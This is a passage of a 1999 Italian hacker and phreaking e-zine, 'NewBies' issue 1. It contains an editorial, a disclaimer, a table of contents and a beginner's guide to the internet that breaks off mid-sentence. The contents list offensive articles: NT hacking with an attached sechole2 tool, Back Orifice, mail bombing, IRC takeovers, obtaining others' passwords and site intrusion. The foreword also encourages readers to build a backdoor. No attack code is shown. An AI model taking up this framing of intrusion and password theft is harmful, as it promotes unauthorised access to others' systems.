Copy Link
Add to Bookmark
Report

NewBies 1

eZine's profile picture
Published in 
NewBies
 · 5 years ago

  

@-,”ì'ì”,.,”ì'ì”,.,”ì'ì”,.,”ì'ì”,.,”ì'ì”,-@
| _ _ ____ _ |
| | \ | | _____ _| __ )(_) ___ ___ |
-+- | \| |/ _ \ \ /\ / / _ \| |/ _ Y __|-+-
: | |\ | __/\ V V /| |_) | | __|__ \ :
| |_| \_|\___| \_/\_/ |____/|_|\___|___/ |
@-,”ì'ì”,.,”ì'ì”,.,”ì'ì”,.,”ì'ì”,.,”ì'ì”,-@

NEW BIES (num 1) (data 31/01/99)

[ powered By ZeroCool and N0bodY88 ]

Editoriale:
Allora questa rivista e' nuovissima e quindi commenti e opinioni sono ben
accette , qui cercheremo di darvi notizie per quanto riguarda i retroscena
della telefonia [ quindi le varie societa' che ci fanno pagare la merda di
bolletta ] , green , phreacking in generale e hacking e poi quel cazzo che
al momento di salta in testa ok detto questo iniziamo.

... tra poco esce il numero zero di NewBies , la nostra e-zine
... io da oggi penso sopratutto a approfondire le mie a volte
limitate capacita' per servire questa e-zines.
NEW BIES e' nato un mese fa' ...
Da quel giorno e' nata una stretta collaborazione dei ' creatori '
di #hackernow, un idea nata dal nulla [ anche se voglio far notare
che pochi si sono impegnanti per l' uscita del numero 0 ] e che oggi
vede la sua realizzazione spettacolare voglio subito dire che non ci
riteniamo bravissimi e quindi ogni critica e' positiva per la nostra
e-zine. Spettacolo io sono convinto che nel scrivere questa rivista
ho migliorato i concetti che gia' erano dentro di me e che sempre vi
rimarrannano ... Spero che questa rivista approfondisca [ o lanci ]
concetti che ci aiuteranno ad arrivare a risultati concreti sia per
quanto riguarda l' hacking e per quanto riguarda il phreacking ...
Non siamo certo a livelli di BFI ma ci proviamo comunque alla fine
e' importante secondo me cercare di approfondire l' underground
italiano [ se ovviamente questo esiste e ne ho forti dubbi ], bho
comunque io sono convinto che sia eccezionale creare qualcosa dal nulla .

ZeroCool

DISCLAIMER LEGALE
------------------------------------------------------------------------------
IL NEWBIES STAFF NON SI ASSUME NESSUNA RESPONSABILITA' X L'UTILIZZO DELLE
TECNICHE SOTTO RIPORTATE, LE QUALI SONO STATE DISTRIBUITE UNICAMENTE X
CONDIVIDERE LE CONOSCENZE DA NOI "ACUISITE" (mitico edu...) E PER CERCARE
QUALCUNO CON CUI CONFONTARE LE NS ESPERIENZE E LE CONOSCENZE X MIGLIORARE
VICENDEVOLMENTE.....DIVERTENDOSI! N0bodY88 of NewBies Staff
------------------------------------------------------------------------------

PREMESSA
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
Questa e-zine e' nata in una giornata qualsiasi di gennaio, mentre 2 newbies
stavano parlando tra loro in IRC di non mi ricordo cosa. Da quel fatidico
giorno la e-zine e' cresciuta, le persone che ho contattato x scrivere un
articolo mi hanno dato la loro disponibilita' e entro alcuni giorni mi hanno
fatto avere il loro operato. Alcune persone hanno fatto tardi x notti intere
(fra cui il sottoscritto) ed hanno sacrificato il loro tempo x creare qualcosa
che fosse nuovo, divertente, che ci facesse diventare + bravi, + amici, + uniti
e forse...beh...forse anche + famosi...hihihi! Questo e' quello che abbiamo
realizzato insieme, collaborando e scambiandoci opinioni. Se questa e-zine
non vi piace, e' troppo semplice o e' stupida non scriveteci (oppure scriveteci
x migliorare un art. della e-zine sfruttando le vostre conoscenze) ma se solo
sara' piaciuta ad una persona, se solo un ragazzo dopo aver letto questa avra'
deciso di passare a linux, di programmare in visual basic, di farsi una propria
backdoor o di mettersi a studiare come si usa telnet (troppo poco attrezzato di
voci nei menu x essere quello tanto decantato dovunque, ma anche troppo simpatico
con il suo prompt a mo di Commodore 64) allora questa e-zine sara' servita a
qualcosa. E ricordate...newbies si nasce, hacker si diventa.
Buona lettura ^__^ N0bodY88
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º ARTICOLO ÌÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎ͹ AUTORE º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
³2 PAROLE SUGLI ALLEGATI N0bodY88 ³
³GUIDA A INTERNET [ X VERI NEWBIES ] DarkSide ³
³LE NOVITA' PER QUANTO RIGUARDA MAMMA TELECOM E LE ALTRE ... ZeroCool ³
³TELEKOM E CENTRALINE [ Dr.Shade e Cyrus The Virus ] I.H.C. ³
³INTERESSANTI INFO SU TELEFONI E AFFINI NewBies Staff ³
³ CABINE X NAVIGARE GRATIS KaOsS ³
³ CELLULARI E SCHEDE TELEFONICHE {PrOzAcK} ³
³GREEN: MA QUANTI CAZZ CE NE SONO ZeroCool ³
³COMPUSERVE ZeroCool ³
³GUIDA ALL' HACKING DI WINDOWS NT Ax1s ³
³CHI HA PAURA DI NET-BUS E BACK ORIFICE? ZeroCool ³
³LINUX NewBies Staff ³
³ LINUX [ UNA MIA DOMANDA ] ZeroCool ³
³ LINUX [ NEWS ] ZeroCool ³
³ IL KERNEL, QUESTO SCONOSCIUTO! ZeroCool ³
³LA POSTA ANONIMA RigoR MorteM ³
³SE IO SONO IO E TU 6 TU KI E' IL + SCEMO TRA NOI 2 Dante Alighieri ³
³COME SI DIVENTA HACKER IN POCHI SEMPLICI PASSI? N0bodY88 ³
³COME NASCONDERE L'IP IN ICQ (MA SOLO IN QUELLO) N0bodY88 ³
³BUGGATI CHE MI BUGGO ANCH'IO [ PHF] L0rD D3sTRu‡Ti0N³
³CHE BELLO EMAILIZZARCI INSIEME - MAIL BOMBING Vecna ³
³COME SI METTE UN BOT? Ja[3]Ck ³
³SEZIONE IRC NewBies Staff ³
³ COME VELOCIZZARE IL TRASFERIMENTO DI FILE IN DCC SU mIRC {D4m4g3~M4N} ³
³ COME FARE UN TAKE-OVER SE L'OP E' UN BENEMERITO IMBECILLE {D4m4g3~M4N} ³
³ COME FARE AD AVERE LA PASS DI QUALCUNO CHIEDENDOGLIELA {D4m4g3~M4N} ³
³COME HACKKARE UN SITO PORNO _p0nic0_ ³
³RFC _p0nic0_ ³
³IP SPOOFING CON I WINGATE Zinco ³
³ CLIENT MIRC Zinco ³
³ CLIENT VIRC Zinco ³
³CURIOSITA' SU... NewBies Staff ³
³ JOE ACCOUNT N0bodY88 ³
³ PRIVACY SU NETSCAPE N0bodY88 ³
³ QUANDO HACKERARE (O ALMENO TENTARE)? N0bodY88 ³
³ COME CREARE UN COLLEGAMENTO INTERNET CON NOTEPAD N0bodY88 ³
³SPOOF Vulcan ³
³TROJAN Vulcan ³
³-=HACKER MANIFESTO=- BY MENTOR TRADOTTO DA x-h4ck3r x-h4ck3r ³
³CHE DIFFERENZA C'E' TRA TCP E UDP? N0bodY88 ³
³QUELLA GRAN TOPA DI E-ZINE CHE STA VENENDO FUORI N0bodY88 ³
³PING - PONG ZeroCool ³
³I SERVER DI NEWS E I PROXY ZeroCool ³
³LISTA MOLTO BREVE DI PROXY N0bodY88 ³
³METAFORA DEL COWBOY .... Dante Alighieri ³
³MANIPOLATI SI' MANIPOLATI NO?! SpIRIToZ ³
³UN PO' DI MAILING LIST ESSENZIALI X HACKERS E NEWBIES CrazyCrom ³
³FRONTPAGE SERVER EXTENSIONS Blum ³
³E-MAIL ASSOLUTAMENTE ANONIME Ax1s ³
³VISUAL BASIC TUTORIAL [ PRIMA PARTE ] Ron|n ³
³C TUTORIAL [ PRIMA PARTE ] CRUSAD3R ³
³GREEN UPDATE [ CHE SFIGA NE HANNO BECCATI ALTRI ] ZeroCool ³
³IL LOG DEL MESE ZeroCool ³
³COSA DI SOLITO CONTIENE IL FILE TEST-CGI.CGI ZeroCool ³
³GREEN UPDATE ZeroCool ³
³MA QUANTO E' BELLA LA VITA ZeroCool ³
³SALUTI Newbies Staff ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

2 PAROLE SUGLI ALLEGATI:
- sechole2.zip = prog che viene utilizzato x fare cio' che spiega Ax1s
- mcrack.htm = pagina che ^Aciburn ci ha consigliato di inserire e che noi
abbiamo "addato" con molto piacere e....ironia....hihihi

N0bodY88
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ GUIDA A INTERNET [ per veri newbies ] ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Ok ragazzi ci siamo, siamo al primo numero di questa e-zine dedicata ai Newbie
ed Š per questo che ho pensato di realizzare una mini guida ad Internet per
tutti quelli che approdano alla Rete per la prima volta, che kazzo mi Š
passato per il cervello, ce ne sono a miliardi, bhe una pi— una meno....
durante la lettura potreste avere l'impressione di averlo gi… letto da qualche
parte sappiate che probabilmente Š cos infatti, questa guida non Š altro che
l sunto di molte, molte letture rielaborate in base alla mia piccola
esperienza personale (sono un Newbie pure io che credete :) ).

BASTA HAI ROTTO!!!

Ok, ok procediamo, mha da dove comincio, il primo DIO..., no non cos dal
principio dunque vediamo ah gi… ecco...

Cos' Š Internet ?

Internet Š in primo luogo un grande insieme di computer collegati tra loro,
su cui vigono determinate convenzioni che permettono la trasmissione dei dati
fra i vari PC, la Rete per• non Š fatta solo di cavi, chip e programmi.
Internet Š fatta da milioni di persone che si scambiano messaggi, ricercano
informazioni, discutono ecc... in poche parole Internet Š una societ… virtuale,
senza confini e come tale ha delle regole che devono essere rispettate o
almeno dovrebbero :).

Come nasce Internet ?

Internet nasce da un progetto del dipartimento della difesa degli USA
negli anni '60 in quanto in durante la guerra fredda gli Stati Uniti volevano
avere un sistema di comunicazione per mandare gli ordini e tenere i contatti
con le proprie forze armate, che non fosse vulnerabile come le centraline
telefoniche, principale obiettivo degli attacchi.

Nel 1964 un ricercatore della Rand Corp., di nome Paul Baran, propose una
soluzione. Egli progett• una rete di comunicazione tra computer che non aveva
alcun nodo centrale e nessuna autorit… governante.
La rete di Baran divenne la base tecnologica di Internet.

Le universit… diedero un grande impulso alla crescita e diffusione di
Internet. Dall'universit… la Rete si espanse alle aziende e alle famiglie.
Oggigiorno chi si connette ad Internet diventa un cittadino del Villaggio
Globale.

Struttura Client - Server

I dialoghi tra computer su Internet si basano sul modello "client-server",
in poche parole, una configurazione di Rete che funziona secondo i principi
di distribuzione dell'informazione e di condivisione di essa da parte di pi—
utenti. In pratica questo modello prevede che ciascun utente possa mettere a
disposizione di altri utenti le informazioni di cui Š in possesso,
(facendo cos da server), e quindi possa a sua volta riceverne da altri
(mettendosi nella condizione di client).  molto importante sottolineare che
i ruoli di server e client non sono predefiniti come molti credono ma, al
contrario sono intercambiabili, esistono comunque anche modelli centralizzati
che non permettono questo scambio di ruoli.

Cosa devo sapere e di cosa ho bisognio per collegarmi ad Internet?

Innanzitutto quello di cui avete bisogno per collegarvi ad Internet Š un PC
dotato di modem, tengo a precisare che non esiste un computer studiato
appositamente per Internet, in pratica la connessione pu• essere effettuata
anche con un computer di vecchia generazione ma, lo svantaggio pi— evidente
sta nel dover subire estenuanti tempi di attesa per la visualizzazione di
qualsiasi pagina.

 di semplice intuizione quindi che, quanto maggiori sono le prestazioni del
vostro PC, tanto pi— veloce sar… la trasmissione dei dati; sottolineo per• che
le buone prestazioni del computer non implicano una costante fluidit… della
navigazione in quanto questa Š determinata anche da altri fattori come per
esempio il traffico telefonico (ammesso che non si disponga di una linea
dedicata).

In secondo luogo, chi vi fornisce l'accesso (provider) deve darvi alcune
informazioni necessarie per la configurazione della procedura di connessione:

1. Gateway secondo le direttive del pop di appartenenza
2. DNS primario ed eventuali altri DNS
3. Dominio
4. Nø di telefono da chiamare per la connessione
5. SMTP, POP3 e NNTP se disponibile
6. Proxy server se disponibile

Ovviamente dovrete comunicare al vostro provider anche la vostra login e
password che dovrete fare in modo di non dimenticare!!  probabile che vi
venga fornito anche un programma (comunemente incluso nel browser ma, non
sempre), che vi seguir… passo per passo nella configurazione della
connessione, nella migliore delle ipotesi potete sperare in una procedura
automatica di connessione grazie alla quale non dovrete fare altro che un
semplice click per ritrovarvi poco dopo a navigare nell'immenso "mare" di
Internet.

Cosa faccio con Internet?

Mi sembra giusto prima di concludere questa introduzione, spendere due parole
sulle potenzialit… di Internet. La prima risorsa a cui un utente approda
quando Š in rete Š il WWW, ma esistono anche molti altri servizi di grande
utilit… quali ad esempio:

FTP
I newsgroup
Le mailing list
Archie
Gopher
IRC
Telnet
ecc...

A questo punto siete pronti per addentrarvi nel mondo stando comodamente
seduti davanti al vostro PC ma, sicuramente non avete idea di come muovervi,
sono cos tante le curiosit… e i dubbi che Internet Š in grado di procurare
che si rischia spesso di non concludere niente, per questo, da qui in poi
cercher• di rispondere ai dubbi pi— comuni che sorgono appena ci si trova
connessi nella stessa sequenza in cui io li ho incontrati e superati.

Cos'Š il WWW?

World Wide Web (ragnatela mondiale) Š il nome (abbreviato in WWW) con il quale
si identifica comunemente l'insieme di ipertesti collegati tra loro che
attualmente costituiscono l'aspetto pi— userfriendly di Internet per chi non
sapesse cos'Š un ipertesto niente paura il concetto Š di estrema facilit…
essi sono semplicemente oggetti informatici, di qualsiasi tipo, che hanno la
caratteristica di contenere al proprio interno oltre a informazioni anche link
(collegamenti) ad altri ipertesti.

Pensando agli infiniti link che si possono creare si ha l'immediata percezione
del vantaggio che gli ipertesti comportano.

Come Š costituito un indirizzo Internet?

Esaminiamo per prima cosa gli indirizzi superficialmente, in modo da riuscire,
in seguito, a comprendere concetti pi— complessi, un indirizzo Internet si
suddivide in 4 parti principali:

1. Protocollo
2. Indirizzo dell'Host
3. Directory (se non specificata il documento si trova in c:\)
4. Nome pagina

Il protocollo pi— usato in Internet Š Http che significa Hyper Text Transfer
Protocol. Indica che state cercando un documento di testo piuttosto che un
file o altro ancora.

Vi sono diversi tipi di protocolli ma per ora basti sapere che i 2 pi— usati
sono il succitato Http e l'Ftp ovvero File Transfer Protocol che serve per
scaricare i file dalla Rete al vostro Pc (Download) e viceversa (Upload).

L'indirizzo dell'Host, se questa Š messa a disposizione per il Web, Š
generalmente preceduto dalla sigla www. mentre se usata per scaricare file il
suo prefisso e' ftp.

La directory specifica fiscamente la posizione del file all'interno dell'Host.

Inutile dire che il nome del documento serve per pescare proprio quello che
ci interessa tra i tanti disponibili.

Grazie a quanto sopra detto ora risulter… facile creare gli indirizzi che pi—
ci interessano come ad esempio:

http://www.univr.it/software.htm

una volta digitato questo indirizzo possiamo ottenere tutto il software che
l'universit… di Verona mette a disposizione dei vari utenti (http:// pu•
essere omesso).

Esaminiamo ora sotto un aspetto pi— particolareggiato gli indirizzi Internet.

Quello che sopra ho sommariamente definito come indirizzo dell' Host Š
scomponibile in sottoparti le quali, hanno tutte un loro nome tecnico che Š
utile conoscere per evitare di trovarsi in difficolt….

La via per imparare Š lunga se si va per regole, breve ed efficace se si
procede per esempi, quindi prendiamo in considerazione il seguente indirizzo:

http://Members.tripod.com/Pub/~Newbie/Homepage.htm

per prima cosa scomponiamolo nelle 4 macro parti principali:

1. Http:// (Protocollo)
2. Members.tripod.com (nome Host)
3. /Pub/~Newbie/ (directory, ~Newbie Š inventata per questo esempio)
4. Homepage.htm (nome pagina, inventato per questo esempio)

Il punto numero 2 si pu• suddividere ulteriormente nelle seguenti sotto parti
a partire da sinistra:

1. Members "nome proprio" (hostname) del computer
2. Tripod dominio di secondo livello o sottodominio (subdomains), a volte ve
ne Š pi— di uno e in quel caso sono sempre pi— grandi a partire da sinistra
verso destra.
3. Com dominio di primo livello o semplicemente dominio

Mi sento in dovere di dire che quanto sopra esposto dovrebbe essere la norma
ma spesso le convenzioni sono diverse.

Esistono circa 258 domini diversi, alcuni domini nazionali sono ad esempio:

.it per Italia
.us per United States
.fr per Francia

ecc..

esistono poi altri domini che identificano le organizzazioni ad essi
appartenenti come ad esempio:

.edu Universit…
.com Societ… commerciali
.org Organizzazioni senza scopo di lucro
.gov Istituzioni governative
.mil Esercito
.net Organizzazioni di gestione della rete

Questo tipo di domini si trovavano in passato solamente all'interno degli USA
ma oggi questa distinizione Š scomparsa.

Importante precisare che non vi Š alcun vero e proprio vincolo geografico che
individui i vari domini e che le informazioni cercate risiedono sull'Hostname,
i subdomains servono a specificare un insieme al quale appartiene l'Host che
contiene il documento cercato.

Tecnicamente l'indirizzo internet si schematizza cos:

metodo://nomemacchina:porta/nomeoggetto

dove il metodo pu• essere Http, Ftp ecc... , il nomemacchina Š il nome del
computer su cui si trova l'oggetto cercato, la porta (solitamente sottintesa)
Š il numero della porta con cui si intende comunicare con l'altra macchina,
esso varia a seconda del metodo scelto. Il nomeoggetto Š il percorso pi— il
nome del file cercato.

Lo schema di cui sopraŠè detto URL (Uniform Resource Locator, ovvero
Localizzatore Uniforme di Risorse) che si rivela essere nient'altro che il
comune indirizzo Internet ormai a tutti noto quindi se doveste imbattervi nel
famoso Error 404 URL Not found i casi sono 3:

1. Avete sbagliato a digitare l'indirizzo, o comunque se avete selezionato un
link l'autore della precedente pagina ha sbagliato a digitarlo
2. Avete digitato correttamente l'indirizzo, ma la fonte da cui lo avete
ricavato vi ha fornito un'informazione errata
3. Avete digitato correttamente l'indirizzo ma, il file corrispondente Š stato
spostato, cancellato o rinominato

In realt… la gestione degli indirizzi Internet Š molto pi— complessa di quanto
possa apparire infatti come Š noto i computer non sanno gestire informazioni
diverse da numeri binari questo comporta ovviamente una serie di problemi
legati alla gestione della Rete in particolare Š lecito chiedersi:
<< Come fa la Rete a sapere dove si trova il computer Prefisso.Hostname
.Dominio ? >>.

Per arrivare alla soluzione di questo problema Š necessario introdurre le
nozioni di:

1. Ip address, ovvero combinazione di 32 bit che identifica univocamente un
qualsiasi computer connesso ad Internet.
2. DNS (Domain Name System) Š il sistema utilizzato dai computer che
gestiscono Internet per tradurre gli indirizzi letterali nel corrispondente
Ip address e viceversa.

Come si pu• facilmente intuire, non Š possibile che in un solo computer siano
memorizzati tutti gli indirizzi letterali con relativo Ip infatti, la
traduzione avviene in diverse fasi grazie all'aiuto di altri elaboratori.

Htm o Html?

A seconda del sistema operativo che si usa le estensioni dei file Web possono
essere .HTM o .HTML. Inizialmente il Web Š stato sviluppato su computer UNIX
e i file avevano estensione .HTML. In seguito con la diffusione di Windows 3.1
entr• in uso l'estensione .Htm per via della limitazione a soli 3 caratteri
nell'estensione dei file gestiti dal DOS-Windows 3.1. Oggi si incontrano
comunemente sia file .HTM che .HTML e anche se Windows 95/98 Š in grado di
gestire file con estensioni maggiori, non tutti i programmi Windows per
l'editing dei file .HTML possono. Inoltre vi sono ancora computer basati
DOS-Windows 3.1 utilizzati per creare pagine Web.

Come Š costituito un indirizzo e-mail?

Leggermente diverso da un indirizzo internet un indirizzo e-mail si compone di
3 parti principali:

1. Il nome dell'account (un identificativo personale)
2. Il simbolo @ (si pronuncia "et" in inglese)
3. Il nome del dominio

L'account Š in genere il nome che ciascuno utilizza per connettersi al proprio
Provider. Dopo l'account c'Š il simbolo @ che serve a separare l'account dal
nome del dominio. Il nome del dominio Š generalmente l'indirizzo della ditta
che fornisce l'accesso ad Internet.

Quello che ho chiamato account pu• essere chiamato in modi molto diversi fra
i quali i pi— comuni sono:

User ID
User Name
Logon ID

Se non si possiede un indirizzo di posta personale e possibile crearsene uno
Online ad esempio io ho 2 indirizzi:

1. xxxxx@xxxxxxxxxxx.it (e-mail personale fornita con il contratto di
abbonamento, censurata per motivi di privacy)
2. dark_s@freemail.it (e-mail online gratuita fornita da Freemail)

Ed in genere agli amici fidati comunico il primo indirizzo mentre ai semplici
conoscenti il secondo, per ovvi motivi di sicurezza personale.

Come faccio a reperire le informazioni che mi interessano?

Purtroppo, al giorno d'oggi, non esiste ancora un elenco di Rete completo da
consultare per trovare tutte le informazioni relative ad un argomento che ci
interessa in particolare perchŠ, sarebbe troppo grande per poter essere
gestito.

Esistono per• siti che danno la possibilit… di effettuare ricerche, che
permettono di trovare pagine che riguardano l'argomento che ci interessa.

Essenzialmente, gli strumenti che un utente medio utilizza pi— di frequente
sono:

1. Indici di rete
2. Motori di ricerca

Negli indici di rete sono memorizzati gli indirizzi divisi per categoria, ed
Š quindi necessario scegliere la categoria a cui si Š interessati per ricevere
un elenco di siti con i relativi rimandi

Si tratta di programmi che accettano in input una o pi— parole chiave e
forniscono in output i documenti che le contengono, ordinati in funzione della
probabilit… che riguardino pi— o meno strettamente l'argomento al quale siamo
interessati, tuttavia, le pagine non sono divise in categorie

Se pur concettualmente diversi questi due strumenti tendono ad un processo di
unificazione per cui oggi non Š pi— possibile una netta distinzione.

Vi sono poi altri strumenti con i quali Š possibile effettuare ricerche ma
noi ci limiteremo ad analizzare i 2 che vanno per la maggiore.

Gli indici di Rete, sono consigliati quando non si vuole ricercare un sito
specifico ma, semplicemente navigare il Web, selezionate l'argomento e buon
viaggio.

I motori di ricerca meritano invece maggiore attenzione, in quanto, per
trovare un argomento in particolare, potrebbe essere necessario formulare
quesiti per mezzo di una sintassi logica ed Š quindi necessario saper utilizzare
in maniera corretta operatori logici quali ad esempio AND, OR, NOT e altri.

Innanzitutto Š da dire che generalmente i motori di ricerca permettono due
tipi di ricerca quella semplice e quella complessa e o avanzata.

Uno dei pi— considerevoli vantaggi della ricerca semplice Š che questa gradua
i risultati automaticamente in modo che i documenti di maggior rilievo, quelli
pi— probabilmente abinabili alla/e parola/e chiave, vengono ad essere
posizionati in cima alla lista dei risultati.
In pi— la Ricerca Semplice consente di ricercare parole e frasi in modo
naturale quindi non si deve necessariamente apprendere una sintassi complicata
o delle formulazioni complesse.

La Ricerca Avanzata si usa se:

1. Si Š in grado di comporre quesiti usando la sintassi logica
2. Si Š interessati a documenti modificati per l'ultima volta in uno specifico
periodo di tempo
3. Si vuole avere una graduazione personalizzata dei risultati
4. Si vogliono cercare parole vicine l'una all'altra, in una distanza massima
di 10 parole

Trattiamo ora dal punto di vista operativo i due tipi di ricerca premettendo
che non tutte le funzioni di seguito esaminate sono standard.

Ricerca semplice

Regole:

Se nella finestra di dialogo di un motore di ricerca si scrive sport calcio si
avranno in output tutti i documenti che contengono sia la parola sport sia la
parola calcio, ovviamente i documenti associati a queste due parole sono milioni
ma si tenga comunque presente che i risultati sono graduati.

Per avere risultati pi— adeguati bisogna prima di tutto imparare ad usare il
pi— (+), il meno (-), le virgolette ("), il carattere jolly (*) e l'uso delle
maiuscole.

Pi— Quando Š posto davanti a una parola si richiede che questa appaia nei
risultati.
Meno Quando Š posto davanti a una parola la esclude dai risultati.

Virgolette Si usano per cercare una frase.

Asterisco Trova tutte le parole che iniziano in un determinato modo.

Maiuscole Si usano se non si vuole che la ricerca sia sensibile alla lettera.

Esempi:

datteri mandorle torta ricetta

Ricerca una ricetta di torta che possibilmente contenga datteri e mandorle,
se il documento contiene tutte e 4 le parole, sar… posizionato in cima alla
lista dei risultati, i documenti che ne contengono solo alcune di seguito e
quelli che ne contengono una alla fine.

auto "
vendita auto"

Cerca tutti i documenti che contengono la frase vendita auto o la parola auto,
le virgolette che racchiudono vendita auto indicano che le parole dovranno
apparire insieme nell'ordine in cui si trovano.

digitaliz*

Il carattere jolly indica che l'utente Š interessato a documenti che
contengono le parole digitalizzazione, digitalizzare, digitalizzato ecc..

+vietnam+film-"
good morning vietnam"

Indica che i documenti devono contenere entrambe le parole (vietnam e film),
ma non possono contenere la frase good morning vietnam.

Ricerca complessa

Regole:

Come gi… detto sopra per utilizzare la ricerca complessa Š necessario
conoscere gli operatori logici che sono:

AND Ricerca i documenti contenenti tutte le parole o frasi specificate.
OR Individua documenti contenenti almeno una delle parole specificate ma
non esclude che tali testi contengano tutte le parole.
NOT Esclude i documenti contenenti la parola o la frase specificata.
Questo operatore non pu• mai essere usato da solo.
NEAR Trova documenti contenenti le parole o frasi specificate entro 10 parole
di distanza l'una dall'altra.
(Le frasi si compongono allo stesso modo visto per la ricerca semplice).

 consigliato inoltre il costante utilizzo delle maiuscole per distinguere le
parole chiave dalle parole cercate.

Inoltre tenete presente che se si deve usare un operatore come parola da
ricercare, bisogna inserire la parola tra virgolette per distinguerla dalla
parola chiave operatore con lo stesso nome.

Nel caso in cui in un quesito vi siano pi— operatori buona abitudine usare le
parentesi () per riunirli con le parole da cercare.

Per circoscrivere una ricerca nel tempo Š necessario specificare la data nel
formato gg/mm/aa dove mm Š espresso con le prime tre lettere inglesi del nome
del mese, inoltre se il mese o l'anno vengono omessi si presume siano quelli
correnti.

Per graduare i risultati si devono inserire le parole nel campo graduazione
altrimenti essi appaiono in ordine casuale Š anche possibile selezionare un
determinato campo di ricerca.

Esempi:

(paperino OR paperinik) AND (paperone OR archimede)

Questo quesito specifica che paperino o paperinik devono comparire nello
stesso documento insieme a paperone o archimede.

Zio NEAR Paperone
Questo quesito specifica che entrambe le parole Zio e Paperone devono essere
presenti al massimo con 10 parole di distanza tra loro, NEAR Š un operatore
molto utile nella ricerca dei nomi.

disney AND (paperino NEAR archimede) AND (NOT paperinik)

Questo quesito specifica che i documenti devono contenere disney e paperino
entro 10 parole da archimede ma non la parola paperinik.

disney AND (NOT(Qui OR Quo OR paper*)) AND Minni
Questo quesito specifica che i documenti trovati devono contenere i termini
disney e Minni ma non possono contenere Qui o Quo o qualsiasi parole che
inizia per paper.

Un particolare ringraziamento alla Disney, prego tutti i lettori di scusarmi
non mi veniva in mente altro :) Piet… .....

Per concludere, rimane da dire che i motori di ricerca funzionano in gran parte
grazie alla buona volontà degli utenti infatti, chiunque pu• inserire un nuovo
URL in un Net Motor. Inoltre esistono 2 tipi di Net Motor:

1. Motori Nazionali
2. Motori Internazionali

in genere questi ultimi permettono anche di selezionare una lingua in
particolare con un semplice click del mouse.
Questa era la panoramica pi— ampia che si potesse dare sui Net Motor, ora
manca solo la pratica, ecco di seguito un elenco dei motori pi— conosciuti:

www.yahoo.com
www.lycos.com
www.infoseek.com
www.hotbot.com
www.altavista.digital.com

Con la pratica si vedr… che molte altre sono le possibilit… che offre il
mondo del WWW ma, quanto gi… detto basta per sapersi orientare.

Cos'Š l'FTP?

Come gi… precedentemente accennato l'ftp Š un protocollo che serve per
scaricare i file dalla rete al vostro PC e viceversa, sebbene questo tipo di
operazione sia possibile anche attraverso WWW, con il protocollo http, usare
ftp Š comunque la scelta migliore.

Diversi sono i motivi che giustificano l'affermazione precedente, ad esempio,
mentre l'http permette il trasferimento di un file, solo se questo compare
come rimando selezionabile, l'ftp permette di leggere le directory e il loro
contenuto, proprio come se ci si trovasse davanti al computer nel quale sono
contenuti i file che si vogliono copiare, (computer remoto). Inoltre, possiamo
muoverci all'interno di queste directory e, grazie ai programmi ftp a
interfaccia grafica, non dobbiamo nemmeno preoccuparci di conoscere i comandi
del sistema operativo installato nel computer remoto infatti, comandi come dir
o ls (in Unix Š l'equivalente del comando dir), vengono impartiti con il
mouse, (si noti che, questi programmi sono piuttosto recenti infatti, prima
bisognava arrangiarsi con l'interfaccia a riga di comando).

Il vantaggio principale che l'utilizzo di questo protocollo comporta Š, a mio
avviso, la possibilit… di riesumare i download interrotti infatti, oggi la
maggior parte dei server ftp fornisce questa possibilit…, molto utile, in
quanto evita inutili perdite di tempo che potrebbero costare molto care in
termini di bolletta telefonica.

In effetti, potrebbe non essere chiaro il significato del termine download,
in parole semplici, questo termine viene utilizzato per indicare il
trasferimento di uno o pi— file dal computer remoto al proprio PC,
l'operazione contraria viene denominata upload.

I collegamenti a un sito ftp, possono essere realizzati in diversi modi
infatti, oltre ai gi… citati programmi a interfaccia grafica, oggi una
sessione ftp pu• essere eseguita con un qualsiasi browser, l'interfaccia Š
quella tipica in altre parole, i file del sito ftp appaiono come collegamenti
